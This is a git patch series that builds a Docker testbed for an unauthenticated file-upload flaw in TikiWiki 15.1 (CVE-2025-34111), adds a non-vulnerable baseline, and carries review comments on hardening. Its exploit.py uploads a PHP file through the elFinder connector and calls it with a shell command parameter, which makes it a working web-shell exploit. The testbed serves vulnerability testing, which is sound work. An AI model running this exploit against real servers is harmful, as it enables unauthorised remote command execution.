From 6433c84c77a14f62c587c6dc1d1c0d5d566371a9 Mon Sep 17 00:00:00 2001
From: crackatoa
Date: Sat, 23 Aug 2025 20:47:54 +0700
Subject: [PATCH 1/9] add tikiwiki testbed
---
tikiwiki/Dockerfile | 26 +++++++++++++++
tikiwiki/README.md | 33 +++++++++++++++++++
tikiwiki/docker-compose.yml | 27 +++++++++++++++
tikiwiki/exploit.py | 66 +++++++++++++++++++++++++++++++++++++
4 files changed, 152 insertions(+)
create mode 100644 tikiwiki/Dockerfile
create mode 100644 tikiwiki/README.md
create mode 100644 tikiwiki/docker-compose.yml
create mode 100644 tikiwiki/exploit.py
diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile
new file mode 100644
index 00000000..57730ad0
--- /dev/null
+++ b/tikiwiki/Dockerfile
@@ -0,0 +1,26 @@
+FROM tikiwiki/php:5-apache
+
+# 1. Fix Debian Stretch repo references and disable expiry checks
+RUN sed -i \
+ -e 's|http://deb.debian.org/debian|http://archive.debian.org/debian|g' \
+ -e 's|http://security.debian.org/debian-security|http://archive.debian.org/debian-security|g' \
+ -e '/stretch-updates/d' \
+ /etc/apt/sources.list \
+ && echo 'Acquire::Check-Valid-Until "false";' > /etc/apt/apt.conf.d/99no-check-valid
+
+# 2. Update apt and install wget + unzip (allow unauthenticated due to deprecated archive)
+RUN apt-get update \
+ && apt-get install -y --allow-unauthenticated wget unzip \
+ && apt-get clean
+
+# 3. Download and unpack TikiWiki 15.1 from the official Situla branch
+WORKDIR /var/www/html
+RUN wget https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -O tiki.zip \
+ && unzip tiki.zip \
+ && rm tiki.zip \
+ && mv tiki-15.1/* . \
+ && mv tiki-15.1/.* . 2>/dev/null || true \
+ && rmdir tiki-15.1
+
+# 4. Ensure Apache user owns the files
+RUN chown -R www-data:www-data /var/www/html
diff --git a/tikiwiki/README.md b/tikiwiki/README.md
new file mode 100644
index 00000000..8196437c
--- /dev/null
+++ b/tikiwiki/README.md
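Review bot: The TikiWiki archive fetched in the `RUN wget … -O tiki.zip` step is unpacked into the web root without any integrity check, so the image content depends on whatever the download URL serves at build time. Pin the expected digest and verify it before `unzip`, for example `echo "<SHA256_OF_TIKI_15.1_ZIP>  tiki.zip" | sha256sum -c -` (placeholder; compute the value from a trusted copy); the same applies to the `curl` form introduced in PATCH 5/9. Steps 1 and 2 also install packages over plain HTTP with `--allow-unauthenticated` and `Check-Valid-Until "false"`, which is tolerable only for a throwaway testbed, and a comment saying so would stop the pattern being copied into other images.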
@@ -0,0 +1,33 @@
+# Unauthenticated File Upload Tikiwiki (CVE-2025-34111) Testbed
+
+## Setup
+
+Build and run vulnerable container using docker compose, it will open port 8080 that run tikiwiki.
+
+1. Run and build tikiwiki docker container
+
+```bash
+docker compose up
+```
+
+2. Follow the setup wizard for tikiwiki installation
+ - Click continue until Database Connection
+ - Fill the input:
+ - Host name: db
+ - Database name: tikiwiki
+ - Database username: tiki
+ - Database password: wiki
+ - Database engine: InnoDB
+ - Continue until "Enter tiki and lock installer"
+ - Set admin password, then logout
+
+
+## How to Trigger the Vulnerability?
+
+To trigger this vulnerability manually, just simply by running the `exploit.py`
+
+```bash
+python3 exploit.py
+```
+
+The response should be contains php webshell (e. g. http://localhost:8080/vendor_extra/elfinder/files/CFRmkPLSTH.php?cmd=whoami)
\ No newline at end of file
diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/docker-compose.yml
new file mode 100644
index 00000000..c63a4ad8
--- /dev/null
+++ b/tikiwiki/docker-compose.yml
@@ -0,0 +1,27 @@
+version: '2'
+
+services:
+ tiki:
+ build: .
+ ports:
+ - "8080:80"
+ depends_on:
+ - db
+ environment:
+ TIKI_DB_NAME: tikiwiki
+ TIKI_DB_USER: tiki
+ TIKI_DB_PASS: wiki
+
+ db:
+ image: mysql:5.6
+ restart: always
+ environment:
+ MYSQL_ROOT_PASSWORD: rootpass
+ MYSQL_DATABASE: tikiwiki
+ MYSQL_USER: tiki
+ MYSQL_PASSWORD: wiki
+ volumes:
+ - db_data:/var/lib/mysql
+
+volumes:
+ db_data:
diff --git a/tikiwiki/exploit.py b/tikiwiki/exploit.py
new file mode 100644
index 00000000..acb97835
--- /dev/null
+++ b/tikiwiki/exploit.py
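Review bot: The `- "8080:80"` mapping under `tiki.ports` in docker-compose.yml publishes the deliberately vulnerable container on every host interface, so anything that can reach the host on port 8080 can reach the unauthenticated upload endpoint. Bind it to loopback instead, `- "127.0.0.1:8080:80"`, and state in the README that the testbed belongs on an isolated machine. The database credentials are hard-coded, which is acceptable for a lab but deserves a one-line comment such as `# lab-only credentials, never reuse`. The same port mapping appears in `docker-compose-safe.yml` in PATCH 9/9.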
@@ -0,0 +1,66 @@
+import requests
+import random
+import string
+from urllib.parse import urljoin
+
+def random_filename():
+ return ''.join(random.choices(string.ascii_letters, k=10)) + ".php"
+
+def check_elfinder(base_url):
+ test_url = urljoin(base_url, 'vendor_extra/elfinder/elfinder.html')
+ res = requests.get(test_url)
+ if res.status_code == 200:
+ print("[+] ELFinder page is accessible. Target likely vulnerable.")
+ return True
+ else:
+ print("[-] ELFinder page not found. Target may not be vulnerable.")
+ return False
+
+def upload_php_payload(base_url, filename, php_code):
+ upload_url = urljoin(base_url, 'vendor_extra/elfinder/php/connector.minimal.php')
+
+ files = {
+ 'cmd': (None, 'upload'),
+ 'target': (None, 'l1_Lw'), # Base64 for "/"
+ 'upload[]': (filename, php_code, 'application/octet-stream')
+ }
+
+ print(f"[+] Uploading {filename}...")
+ res = requests.post(upload_url, files=files)
+ if res.status_code == 200:
+ print("[+] Upload appears successful.")
+ return True
+ else:
+ print("[-] Upload failed.")
+ return False
+
+def trigger_backdoor(base_url, filename):
+ shell_url = urljoin(base_url, f'vendor_extra/elfinder/files/{filename}')
+ print(f"[+] Triggering payload at {shell_url}")
+ res = requests.get(shell_url)
+ if res.status_code == 200:
+ print("[+] Payload executed (response below):\n")
+ print(res.text)
+ else:
+ print("[-] Could not trigger the payload.")
+
+def main():
+ # === Prompt for base URL ===
+ base_url = input("Enter TikiWiki base URL (e.g. http://localhost:8080): ").strip()
+ if not base_url.endswith('/'):
+ base_url += '/'
+
+ php_payload = "" # Simple web shell
+ filename = random_filename()
+
+ if not check_elfinder(base_url):
+ return
+
+ if upload_php_payload(base_url, filename, php_payload):
+ trigger_backdoor(base_url, filename)
+ print(f"[!]
Try executing a command: {base_url}vendor_extra/elfinder/files/{filename}?cmd=whoami") + else: + print("[-] Exploit failed during upload.") + +if __name__ == "__main__": + main() From 3b82697f6e87dcdc8e76068b8e0b7c5a695386c5 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:04:21 +0700 Subject: [PATCH 2/9] Update tikiwiki/exploit.py Co-authored-by: Savio Sisco --- tikiwiki/exploit.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tikiwiki/exploit.py b/tikiwiki/exploit.py index acb97835..ba38ea21 100644 --- a/tikiwiki/exploit.py +++ b/tikiwiki/exploit.py @@ -35,8 +35,8 @@ def upload_php_payload(base_url, filename, php_code): return False def trigger_backdoor(base_url, filename): - shell_url = urljoin(base_url, f'vendor_extra/elfinder/files/{filename}') - print(f"[+] Triggering payload at {shell_url}") + shell_url = urljoin(base_url, f'vendor_extra/elfinder/files/{filename}?cmd=id') + print(f"[+] Running 'id' at {shell_url}") res = requests.get(shell_url) if res.status_code == 200: print("[+] Payload executed (response below):\n") From 58572013bdad1fcd5339c8c65cfe9b91209eabdf Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:04:37 +0700 Subject: [PATCH 3/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index 57730ad0..5dfe5d14 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile 
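Review bot: None of the `requests.get`/`requests.post` calls in `check_elfinder`, `upload_php_payload` and `trigger_backdoor` of the new exploit.py pass a timeout, so the script blocks indefinitely when the container is still starting or the setup wizard has not been completed; add `timeout=10` to each call. `main()` also accepts any URL typed at the prompt although the README only covers the local container, so defaulting to `http://localhost:8080/` would keep the script tied to the testbed. The uploaded file stays in `vendor_extra/elfinder/files/` afterwards, and the README should tell users to remove the stack with `docker compose down` when the test is finished. None of the functions has a docstring; a one-line summary on each would be enough.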
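Review bot: In `trigger_backdoor` (PATCH 2/9) a 200 status is still reported as "Payload executed", yet a server that returns the uploaded file as plain text or answers with a custom error page also replies 200, so the script cannot tell the vulnerable container from the non-vulnerable baseline. Since the request now runs `id`, check the body as well, `if res.status_code == 200 and "uid=" in res.text:`. The closing message in `main()` still suggests `?cmd=whoami`, which no longer matches what this function runs. The body of `trigger_backdoor` continues past the end of the hunk.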
@@ -1,17 +1,5 @@ FROM tikiwiki/php:5-apache -# 1. Fix Debian Stretch repo references and disable expiry checks -RUN sed -i \ - -e 's|http://deb.debian.org/debian|http://archive.debian.org/debian|g' \ - -e 's|http://security.debian.org/debian-security|http://archive.debian.org/debian-security|g' \ - -e '/stretch-updates/d' \ - /etc/apt/sources.list \ - && echo 'Acquire::Check-Valid-Until "false";' > /etc/apt/apt.conf.d/99no-check-valid - -# 2. Update apt and install wget + unzip (allow unauthenticated due to deprecated archive) -RUN apt-get update \ - && apt-get install -y --allow-unauthenticated wget unzip \ - && apt-get clean # 3. Download and unpack TikiWiki 15.1 from the official Situla branch WORKDIR /var/www/html From efd862b8dc3d5b45eadc6391a7411a9dbbd1bba9 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:04:45 +0700 Subject: [PATCH 4/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index 5dfe5d14..ab323689 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile @@ -5,10 +5,8 @@ FROM tikiwiki/php:5-apache WORKDIR /var/www/html RUN wget https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -O tiki.zip \ && unzip tiki.zip \ - && rm tiki.zip \ && mv tiki-15.1/* . \ - && mv tiki-15.1/.* . 2>/dev/null || true \ - && rmdir tiki-15.1 + && rm -r tiki.zip tiki-15.1 # 4. Ensure Apache user owns the files RUN chown -R www-data:www-data /var/www/html From c53ae2d9bbfebeb329777d8dd5d97e7c8021d842 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:05:00 +0700 Subject: [PATCH 5/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index ab323689..c9722db1 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile 
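Review bot: Dropping the `mv tiki-15.1/.* .` step in PATCH 4/9 means any top-level dotfiles in the archive (an `.htaccess`, for example) are no longer copied into `/var/www/html` and are then deleted by `rm -r tiki.zip tiki-15.1`. Whether the 15.1 archive ships such files is not visible in this series, so please confirm the resulting web root matches a normal install; otherwise the testbed may behave differently from a real deployment. If they are needed, `cp -a tiki-15.1/. .` copies hidden entries too, without the `|| true` that previously masked failures in the chain.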
@@ -1,9 +1,11 @@ FROM tikiwiki/php:5-apache -# 3. Download and unpack TikiWiki 15.1 from the official Situla branch +USER www-data WORKDIR /var/www/html -RUN wget https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -O tiki.zip \ + +# Download and unpack TikiWiki 15.1 from the official Situla branch +RUN curl -L https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -o tiki.zip \ && unzip tiki.zip \ && mv tiki-15.1/* . \ && rm -r tiki.zip tiki-15.1 From 5d410b515c37b9e249a6045c67eb38fa1e7400cb Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:05:08 +0700 Subject: [PATCH 6/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 2 -- 1 file changed, 2 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index c9722db1..6f220973 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile @@ -10,5 +10,3 @@ RUN curl -L https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15. && mv tiki-15.1/* . \ && rm -r tiki.zip tiki-15.1 -# 4. Ensure Apache user owns the files -RUN chown -R www-data:www-data /var/www/html From ed0a204798a686d7073e4705d08f6cfddb73688a Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:05:15 +0700 Subject: [PATCH 7/9] Update tikiwiki/docker-compose.yml Co-authored-by: Savio Sisco --- tikiwiki/docker-compose.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/docker-compose.yml index c63a4ad8..74d77a61 100644 --- a/tikiwiki/docker-compose.yml +++ b/tikiwiki/docker-compose.yml @@ -20,8 +20,3 @@ services: MYSQL_DATABASE: tikiwiki MYSQL_USER: tiki MYSQL_PASSWORD: wiki - volumes: - - db_data:/var/lib/mysql - -volumes: - db_data: From 843be450b326feec1cf1d3e0476558b3394c78ce Mon Sep 17 00:00:00 2001 
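Review bot: The new `curl -L … -o tiki.zip` in PATCH 5/9 has no `-f`, so an HTTP error response is saved as `tiki.zip` and the build only fails later at `unzip` with a misleading message; use `curl -fL`. With `USER www-data` placed before the `RUN`, the step depends on `/var/www/html` being writable by that user and on `curl` and `unzip` being present in the base image now that the `apt-get install` step is gone; neither is visible in this series, so a short comment stating the assumption would help. The image also keeps the whole web root writable by the web server user, which should be called out in a comment as intentional for the testbed.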
From: crackatoa Date: Sun, 7 Sep 2025 18:21:03 +0700 Subject: [PATCH 8/9] remove version docker-compose.yml --- tikiwiki/docker-compose.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/docker-compose.yml index 74d77a61..5aad7e06 100644 --- a/tikiwiki/docker-compose.yml +++ b/tikiwiki/docker-compose.yml @@ -1,5 +1,3 @@ -version: '2' - services: tiki: build: . From bff9013ba4eeca10d92c49336749f81a9ce50585 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Fri, 12 Sep 2025 10:01:41 +0700 Subject: [PATCH 9/9] Add non vulnerable version --- tikiwiki/{ => CVE-2025-34111}/Dockerfile | 0 tikiwiki/{ => CVE-2025-34111}/README.md | 8 ++++++++ .../CVE-2025-34111/docker-compose-safe.yml | 19 +++++++++++++++++++ .../{ => CVE-2025-34111}/docker-compose.yml | 0 tikiwiki/{ => CVE-2025-34111}/exploit.py | 0 5 files changed, 27 insertions(+) rename tikiwiki/{ => CVE-2025-34111}/Dockerfile (100%) rename tikiwiki/{ => CVE-2025-34111}/README.md (89%) create mode 100644 tikiwiki/CVE-2025-34111/docker-compose-safe.yml rename tikiwiki/{ => CVE-2025-34111}/docker-compose.yml (100%) rename tikiwiki/{ => CVE-2025-34111}/exploit.py (100%) diff --git a/tikiwiki/Dockerfile b/tikiwiki/CVE-2025-34111/Dockerfile similarity index 100% rename from tikiwiki/Dockerfile rename to tikiwiki/CVE-2025-34111/Dockerfile diff --git a/tikiwiki/README.md b/tikiwiki/CVE-2025-34111/README.md similarity index 89% rename from tikiwiki/README.md rename to tikiwiki/CVE-2025-34111/README.md index 8196437c..b1ffb456 100644 --- a/tikiwiki/README.md +++ b/tikiwiki/CVE-2025-34111/README.md @@ -6,10 +6,18 @@ Build and run vulnerable container using docker compose, it will open port 8080 1. Run and build tikiwiki docker container +Vulnerable version + ```bash docker compose up ``` +Non-vulnerable version + +```bash +docker compose -f docker-compose-safe.yml up +``` + 2. Follow the setup wizard for tikiwiki installation - Click continue until Database Connection - Fill the input: 
diff --git a/tikiwiki/CVE-2025-34111/docker-compose-safe.yml b/tikiwiki/CVE-2025-34111/docker-compose-safe.yml new file mode 100644 index 00000000..2441bb70 --- /dev/null +++ b/tikiwiki/CVE-2025-34111/docker-compose-safe.yml @@ -0,0 +1,19 @@ +services: + tiki: + image: tikiwiki/tikiwiki:20.x + ports: + - "8080:80" + depends_on: + - db + environment: + - TIKI_DB_USER=tiki + - TIKI_DB_PASS=wiki + - TIKI_DB_NAME=tikiwiki + db: + image: mariadb + environment: + - MYSQL_USER=tiki + - MYSQL_PASSWORD=wiki + - MYSQL_DATABASE=tikiwiki + - MYSQL_ROOT_PASSWORD=tkwkiiii + - TERM=dumb \ No newline at end of file diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/CVE-2025-34111/docker-compose.yml similarity index 100% rename from tikiwiki/docker-compose.yml rename to tikiwiki/CVE-2025-34111/docker-compose.yml diff --git a/tikiwiki/exploit.py b/tikiwiki/CVE-2025-34111/exploit.py similarity index 100% rename from tikiwiki/exploit.py rename to tikiwiki/CVE-2025-34111/exploit.py
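Review bot: Both images in docker-compose-safe.yml float: `image: mariadb` resolves to whatever the default tag is at pull time and `tikiwiki/tikiwiki:20.x` is a moving branch tag, so the non-vulnerable baseline is not reproducible and may stop starting after a new database release. Pin each to a specific version or digest, for example `image: mariadb:<PINNED_VERSION>` (placeholder). The README should also state what `exploit.py` is expected to print against this stack, so a reader can confirm the fix rather than assume it.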